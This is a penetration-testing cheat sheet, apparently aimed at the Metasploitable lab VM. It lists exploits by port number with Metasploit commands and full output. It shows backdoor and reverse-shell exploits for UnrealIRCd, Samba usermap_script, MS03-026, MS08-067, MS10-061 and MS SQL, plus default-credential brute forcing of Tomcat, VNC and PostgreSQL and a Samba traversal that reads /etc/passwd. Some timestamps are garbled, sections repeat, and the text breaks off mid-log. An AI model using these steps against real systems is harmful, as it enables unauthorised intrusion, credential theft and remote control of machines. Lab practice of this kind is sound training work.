0 Exploits - Port Number

port 6667 - Unreal ircd (win/linux)

port 1524 - ingreslock (linux)

port 8180 - tomcat_mgr_login (win/linux)

port 139 - (linux)

port 139/445 - (linux)

port 445 - (linux)

port 135 - msrpc (win)

port 445 - microsoft-ds (win)

port 1433 - ms-sql-s (win)

port 5900 - vnc (win/linux)

port 5432 - postgresql (linux)

port 25 - smtp

port 3306 - mysql (linux)

port 21 - FTP (linux)

exploits bellow tested with backtrack 5r1

----------------------------------------------------------------------------------

port 6667 - Unreal ircd (win/linux)

root@bt:~# nmap -sV -sC -v -p 6667 IP-Address

6667/tcp open irc Unreal ircd

| irc-info: Server: irc.Metasploitable.LAN

| Version: Unreal3.2.8.1. irc.Metasploitable.LAN

| Lservers/Lusers: 0/1

| Uptime: 0 days, 0:04:32

|_Source ident: OK nmap

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf exploit(unreal_ircd_3281_backdoor) > set rhost IP-Address

msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler

[*] Connected to 192.168.1.20:6667...

:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...

:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

[*] Sending backdoor command...

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo ahaBucJmQvi2ONTC;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "ahaBucJmQvi2ONTC\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Address:59446) at 2011-02-21 08:39:04 +0100

----------------------------------------------------------------------------------

port 1524 - ingreslock (linux)

1524/tcp open ingreslock?

The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Accessing it is easy:

root@bt# telnet 192.168.1.20 1524

Trying 192.168.1.20...

Connected to 192.168.1.20.

Escape character is '^]'.

root@test:/# id

uid=0(root) gid=0(root) groups=0(root)

----------------------------------------------------------------------------------

port 8180 - tomcat_mgr_login (win/linux)

msf auxiliary(tomcat_mgr_login) > use scanner/http/tomcat_mgr_login

msf auxiliary(tomcat_mgr_login) > set rport 8180

msf auxiliary(tomcat_mgr_login) > set rhosts Remote-IP-Address

msf auxiliary(tomcat_mgr_login) > run

[*] Remote-IP-Address:8180 TOMCAT_MGR - [01/56] - Trying username:'admin' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [01/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [02/56] - Trying username:'manager' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [02/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [03/56] - Trying username:'role1' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [03/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [04/56] - Trying username:'root' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [04/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [05/56] - Trying username:'tomcat' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [05/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [06/56] - Trying username:'both' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [06/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [07/56] - Trying username:'j2deployer' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [07/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [08/56] - Trying username:'ovwebusr' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [08/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [09/56] - Trying username:'cxsdk' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [09/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [10/56] - Trying username:'ADMIN' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [10/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [11/56] - Trying username:'xampp' with password:''

[-] Remote-IP-Address:8180 TOMCAT_MGR - [11/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [12/56] - Trying username:'admin' with password:'admin'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [12/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [13/56] - Trying username:'manager' with password:'manager'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [13/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [14/56] - Trying username:'role1' with password:'role1'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [14/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [15/56] - Trying username:'root' with password:'root'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [15/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [16/56] - Trying username:'tomcat' with password:'tomcat'

[+] http://Remote-IP-Address:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [17/56] - Trying username:'both' with password:'both'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [17/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [18/56] - Trying username:'j2deployer' with password:'j2deployer'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [18/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [19/56] - Trying username:'ovwebusr' with password:'ovwebusr'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [19/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [20/56] - Trying username:'cxsdk' with password:'cxsdk'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [20/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [21/56] - Trying username:'ADMIN' with password:'ADMIN'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [21/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [22/56] - Trying username:'xampp' with password:'xampp'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [22/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [23/56] - Trying username:'ovwebusr' with password:'OvW*busr1'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [23/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [24/56] - Trying username:'cxsdk' with password:'kdsxc'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [24/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [25/56] - Trying username:'root' with password:'owaspbwa'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [25/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [26/56] - Trying username:'admin' with password:'manager'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [26/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [27/56] - Trying username:'admin' with password:'role1'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [27/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [28/56] - Trying username:'admin' with password:'root'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [28/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [29/56] - Trying username:'admin' with password:'tomcat'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [29/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [30/56] - Trying username:'admin' with password:'s3cret'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [30/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [31/56] - Trying username:'manager' with password:'admin'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [31/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [32/56] - Trying username:'manager' with password:'role1'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [32/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [33/56] - Trying username:'manager' with password:'root'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [33/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [34/56] - Trying username:'manager' with password:'tomcat'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [34/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [35/56] - Trying username:'manager' with password:'s3cret'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [35/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [36/56] - Trying username:'role1' with password:'admin'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [36/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [37/56] - Trying username:'role1' with password:'manager'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [37/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [38/56] - Trying username:'role1' with password:'root'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [38/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [39/56] - Trying username:'role1' with password:'tomcat'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [39/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [40/56] - Trying username:'role1' with password:'s3cret'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [40/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [41/56] - Trying username:'root' with password:'admin'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [41/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [42/56] - Trying username:'root' with password:'manager'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [42/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [43/56] - Trying username:'root' with password:'role1'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [43/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [44/56] - Trying username:'root' with password:'tomcat'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [44/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [45/56] - Trying username:'root' with password:'s3cret'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [45/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [46/56] - Trying username:'both' with password:'admin'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [46/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [47/56] - Trying username:'both' with password:'manager'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [47/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [48/56] - Trying username:'both' with password:'role1'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [48/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [49/56] - Trying username:'both' with password:'root'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [49/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [50/56] - Trying username:'both' with password:'tomcat'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [50/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [51/56] - Trying username:'both' with password:'s3cret'

[-] Remote-IP-Address:8180 TOMCAT_MGR - [51/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

----------------------------------------------------------------------------------

port 139 - (linux)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

root@bt:# smbclient -L //Remote-IP-Address

Enter root's password:

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Sharename Type Comment

--------- ---- -------

print$ Disk Printer Drivers

tmp Disk oh noes!

opt Disk

IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))

ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Server Comment

--------- -------

METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)

Workgroup Master

--------- -------

WORKGROUP METASPLOITABLE

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > set RHOST Remote-IP-Address

msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server...

[*] Trying to mount writeable share 'tmp'...

[*] Trying to link 'rootfs' to the root filesystem...

[*] Now access the following share to browse the root filesystem:

[*] \\192.168.99.131\tmp\rootfs\

msf auxiliary(samba_symlink_traversal) > exit

root@bt:# smbclient //Remote-IP-Address1/tmp

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

[..]

----------------------------------------------------------------------------------

port 139/445 - (linux)

samba "username map script" command execution

msf > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > set rhost Remote-IP-Addres

msf exploit(usermap_script) > set lhost Local-IP-Address

msf exploit(usermap_script) > set rport 139 or 445 (both will work)

msf exploit(usermap_script) > set payload cmd/unix/reverse

msf exploit(usermap_script) > exploit

[*] Started reverse double handler

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo AGo0tmuVPzZXPNPw;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "AGo0tmuVPzZXPNPw\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Addres:51822) at 2012-10-05 14:35:10 +0100

----------------------------------------------------------------------------------

port 445 - (linux)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

root@bt:# smbclient -L //Remote-IP-Address

Enter root's password:

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Sharename Type Comment

--------- ---- -------

print$ Disk Printer Drivers

tmp Disk oh noes!

opt Disk

IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))

ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Server Comment

--------- -------

METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)

Workgroup Master

--------- -------

WORKGROUP METASPLOITABLE

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > set RHOST Remote-IP-Address

msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server...

[*] Trying to mount writeable share 'tmp'...

[*] Trying to link 'rootfs' to the root filesystem...

[*] Now access the following share to browse the root filesystem:

[*] \\192.168.99.131\tmp\rootfs\

msf auxiliary(samba_symlink_traversal) > exit

root@bt:# smbclient //Remote-IP-Address1/tmp

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

[..]

----------------------------------------------------------------------------------

port 135 - msrpc (win)

msf > use exploit/windows/dcerpc/ms03_026_dcom

msf exploit(ms03_026_dcom) > set lhost IP-Address

msf exploit(ms03_026_dcom) > set rhost IP-Address

msf exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on IP-Address:4444

[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...

[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] ...

[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] ...

[*] Sending exploit ...

----------------------------------------------------------------------------------

port 445 - microsoft-ds (win)

use windows/smb/ms08_067_netapi

set rhost 192.168.0.200

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.1

exploit

[*] Started reverse handler on 192.168.0.1:4444

[*] Automatically detecting the target…

[*] Fingerprint: Windows XP – Service Pack 3 – lang:English

[*] Selected Target: Windows XP SP3 English (NX)

[*] Attempting to trigger the vulnerability…

[*] Sending stage (749056 bytes) to 192.168.0.200

[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.200:1472)

Once done you need to open the console by typing the bellow after the >

meterpreter > execute -f cmd.exe -c

Process 1120 created.

Channel 1 created.

meterpreter > interact 1

Interacting with channel 1…

Microsoft Windows XP

(C) Copyright 1985-2001 Microsoft Corp.

myexploit.wordpress.com/control-smb-445-137-139/

And local printer exploit

msf > use exploit/windows/smb/ms10_061_spoolss

msf exploit(ms10_061_spoolss) > info

Name: Microsoft Print Spooler Service Impersonation Vulnerability

Module: exploit/windows/smb/ms10_061_spoolss

Version: 13208

Platform: Windows

Privileged: Yes

License: Metasploit Framework License (BSD)

Rank: Excellent

Provided by:

jduck

hdm

Available targets:

Id Name

-- ----

0 Windows Universal

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

PNAME no The printer share name to use on the target

RHOST yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE spoolss no The named pipe for the spooler service

Payload information:

Space: 1024

Avoid: 0 characters

Description:

This module exploits the RPC service impersonation vulnerability

detailed in Microsoft Bulletin MS10-061. By making a specific DCE

RPC request to the StartDocPrinter procedure, an attacker can

impersonate the Printer Spooler service to create a file. The

working directory at the time is %SystemRoot%\system32. An attacker

can specify any file name, including directory traversal or full

paths. By sending WritePrinter requests, an attacker can fully

control the content of the created file. In order to gain code

execution, this module writes to a directory used by Windows

Management Instrumentation (WMI) to deploy applications. This

directory (Wbem\Mof) is periodically scanned and any new .mof files

are processed automatically. This is the same technique employed by

the Stuxnet code found in the wild.

References:

http://www.osvdb.org/67988

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729

http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx

msf exploit(ms10_061_spoolss) > set rhost Remote-IP-Address

msf exploit(ms10_061_spoolss) > exploit

[*] Started reverse handler on Local-IP-Address:4444

[*] Trying target Windows Universal...

[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...

[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...

[*] Attempting to exploit MS10-061 via \\IP-Address\PWN-AGFA-Acc ...

[*] Printer handle: 000000008493a66b538fa546865d85bb85e8f036

[*] Job started: 0x2

[*] Wrote 73802 bytes to %SystemRoot%\system32\pDeC6njEHgezu5.exe

[*] Job started: 0x3

[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\9Y3E56ufs7KWqm.mof

[*] Everything should be set, waiting for a session...

[*] Sending stage (752128 bytes) to Remote-IP-Address

[*] Meterpreter session 4 opened (Local-IP-Address:4444 -> Remote-IP-Address:1033) at 1476-12-06 17:24:48 +0000

meterpreter >

----------------------------------------------------------------------------------

port 1433 - ms-sql-s (win)

msf > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin

msf exploit(ms09_004_sp_replwritetovarbin) > set lhost IP-Address

lhost => IP-Address

msf exploit(ms09_004_sp_replwritetovarbin) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms09_004_sp_replwritetovarbin) > set rhost IP-Address

rhost => IP-Address

msf exploit(ms09_004_sp_replwritetovarbin) > exploit

[*] Started reverse handler on IP-Address:4444

[*] Attempting automatic target detection...

[*] Automatically detected target "MSSQL 2005 SP0 (9.00.1399.06)"

[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8

[*] Sending stage (752128 bytes) to IP-Address

[*] Meterpreter session 1 opened (IP-Address:4444 -> IP-Address:1063) at 2012-07-10 15:16:39 +0100

----------------------------------------------------------------------------------

port 5900 - vnc (win/linux)

root@bt:~# nmap -sS -sC -p 5900 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 14:25 BST

Nmap scan report for IP-Address

Host is up (0.00054s latency).

PORT STATE SERVICE

5900/tcp open vnc

| vnc-info:

| Protocol version: 3.3

| Security types:

|_ Unknown security type (33554432)

MAC Address: 08:00:27:EB:18:CC (Micky Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

msf > use auxiliary/scanner/vnc/vnc_login

msf auxiliary(vnc_login) > set PASS_FILE /opt/metasploit-4.1.4/msf3/data/wordlists/vnc_passwords.txt

msf auxiliary(vnc_login) > set rhosts IP-Address

msf auxiliary(vnc_login) > set BRUTEFORCE_SPEED 3

msf auxiliary(vnc_login) > run

[*] IP-Address:5900 - Starting VNC login sweep

[*] IP-Address:5900 VNC - [01/18] - Attempting VNC login with password ''

[*] IP-Address:5900 VNC - [01/18] - , VNC server protocol version : 3.3

[-] IP-Address:5900 VNC - [01/18] - , Authentication failed

[*] IP-Address:5900 VNC - [02/18] - Attempting VNC login with password 'password'

[*] IP-Address:5900 VNC - [02/18] - , VNC server protocol version : 3.3

[+] IP-Address:5900, VNC server password : "password"

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

2. Open vncviewer or tsclient

root@bt:~# vncviewer ip-address:5900

root@bt:~# tsclient

Computer = IP-Address

Protocol = VNC

Username = leave blank

Press connect

3. A Password box will open type in password press enter.

port 8180 - tomcat_mgr_login (win/linux)

----------------------------------------------------------------------------------

port 5432 - postgresql (linux)

root@bt:~# nmap -sV -p 22,5432 --open Remote-IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-10-05 15:46 BST

Nmap scan report for Remote-IP-Address

Host is up (0.00045s latency).

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7

MAC Address: 01:02:03:04:05:06 (Micky Systems)

Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds

msf > search PostgreSQL

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query

auxiliary/admin/postgres/postgres_sql normal PostgreSQL Server Generic Query

auxiliary/scanner/postgres/postgres_login normal PostgreSQL Login Utility

auxiliary/scanner/postgres/postgres_version normal PostgreSQL Version Probe

exploit/windows/postgres/postgres_payload 2009-04-10 00:00:00 UTC excellent PostgreSQL for Microsoft Windows Payload Execution

msf > use auxiliary/scanner/postgres/postgres_login

msf auxiliary(postgres_login) > set rhosts Remote-IP-Address

msf auxiliary(postgres_login) > exploit

[*] Remote-IP-Address:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'postgres':''

[-] Remote-IP-Address:5432 Postgres - [01/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':''

[-] Remote-IP-Address:5432 Postgres - [02/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':''

[-] Remote-IP-Address:5432 Postgres - [03/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':''

[-] Remote-IP-Address:5432 Postgres - [04/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'

[+] Remote-IP-Address:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'

[+] Remote-IP-Address:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)

[*] Remote-IP-Address:5432 Postgres - Disconnected

[*] Remote-IP-Address:5432 Postgres - [06/21] - Trying username:'scott' with password:'scott' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'scott'

[-] Remote-IP-Address:5432 Postgres - [06/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [07/21] - Trying username:'admin' with password:'admin' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'admin'

[-] Remote-IP-Address:5432 Postgres - [07/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [08/21] - Trying username:'admin' with password:'password' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'password'

[-] Remote-IP-Address:5432 Postgres - [08/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [09/21] - Trying username:'' with password:'tiger' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'tiger'

[-] Remote-IP-Address:5432 Postgres - [09/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [10/21] - Trying username:'' with password:'postgres' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'postgres'

[-] Remote-IP-Address:5432 Postgres - [10/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [11/21] - Trying username:'' with password:'password' on database 'template1'

